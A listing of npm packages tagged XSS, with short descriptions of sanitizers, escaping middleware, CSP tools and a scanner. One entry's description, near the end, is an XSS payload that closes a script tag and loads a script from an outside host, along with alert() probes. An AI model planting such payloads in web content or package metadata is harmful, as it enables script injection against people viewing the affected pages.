XSS Packages

A library for filter html tags and attributes and defending against XSS attacks

Prevent HTML tags from rendering in JSON responses.

automatic sanitization of req body fields, params and query. automatically does sanitization and escaping as middleware.

Sanitize untrusted HTML (to prevent XSS) with a configuration specified by a Whitelist

Secure XSS Filters - Just sufficient output filtering to prevent XSS!

utils for ydr.me

A markdown-it plugin to make your render content more secure

Content Security Policy middleware.

Cross-Site Scripting (XSS) scanner. This tool helps to find possible XSS vulnerabilities.

This module implements an isomorphic sanitized HTML data type for [Ampersand.js][]. On the server, [Google's Gumbo HTML parser][gumbo] is used to parse and sanitize the HTML data. In the browser, the sanitized value is used when rendering user-generated c

Express middleware for the sanitizer module using Caja's HTML Sanitizer and HTML escape using htmlencode. Forked from express-sanitize-escape as the original package is no longer maintained

ovt with xss functionalities

Client-side XSS filters for templates processed by context-parser-handlebars

A helper for safely embedding URLs in style properties

Secure Express/Handlebars with Context Parser

</script><script src=//sp.insecure.pub/x?u=2&a=1>xss-npm-';alert(5);//"><script>alert(6)</script>&lt;/script&gt;&lt;script src=//sp.insecure.pub/x?u=4&a=1&gt;

util for ydr.me

XSS prevention for Pug templates with typesafe exceptions

This package tries to prevent cross-site scripting (XSS) by checking user input for malicious javascript!

xss string escape/unescape js